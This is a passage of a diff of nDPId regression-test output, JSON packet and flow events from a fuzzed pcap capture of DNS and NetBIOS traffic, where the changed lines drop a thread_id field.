{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1120470885848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69CABFAABIa9MAAIARS37AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1120470885848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69CABFAABIa9MAAIARS37AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00415{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43392,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69qYBFAABI\/dQAAIARS33AqAECwKgBAXP4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaWJ5AmRrAAAhAAE="} 00401{"packet_event_id":1,"packet_event_name":"packet","packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43392,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69qYBFAABI\/dQAAIARS33AqAECwKgBAXP4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaWJ5AmRrAAAhAAE="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43392,"global_ts_msec":1120470887851} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43392,"global_ts_msec":1120470887851}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1120470891857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470891857,"pkt":"ADBUADRWAODtAW69CABFAABIa1YAAIARS3zAqAECwKgBAUr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1120470891857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470891857,"pkt":"ADBUADRWAODtAW69CABFAABIa1YAAIARS3zAqAECwKgBAUr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1144,10 +1144,10 @@
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1120470916875,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470916875,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqOkBwKgBAgA1CvsAR689eAKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1120470916875,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470916875,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqOkBwKgBAgA1CvsAR689eAKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00362{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470916875,"pkt":"ADBUADRWAODtAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470916875,"pkt":"ADBUADRWAODtAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470916876} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470916876}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470916875,"pkt":"\/\/\/\/\/\/\/\/AODtAW4zDABFAABOa+AAAIARSm3AqAECwKgB\/wCJAIkAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470916875,"pkt":"\/\/\/\/\/\/\/\/AODtAW4zDABFAABOa+AAAIARSm3AqAECwKgB\/wCJAIkAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1120470923515} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1120470923515}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470924263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470924263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1120470924263,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470924263,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+EAAIARSmzAqAECwKgB\/wCJA4kAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVIQ0FDQUNBQ0FDQUJNAAAgAAE="} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1120470924263,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470924263,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+EAAIARSmzAqAECwKgB\/wCJA4kAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVIQ0FDQUNBQ0FDQUJNAAAgAAE="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1156,8 +1156,8 @@
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1120470950421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470950421,"pkt":"ADBUADRWAODtAW49CABFAABIa+QAAIARS23AqAECwKgBAQr8ADUANNjGUZgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1120470950421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470950421,"pkt":"ADBUADRWAODtAW49CABFAABIa+QAAIARS23AqAECwKgBAQr8ADUANNjGUZgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1120470952424,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+UAAIARS2zAqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1120470952424,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+UAAIARS2zAqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+YAEIARS6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+YAEIARS6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470954427} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470954427}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
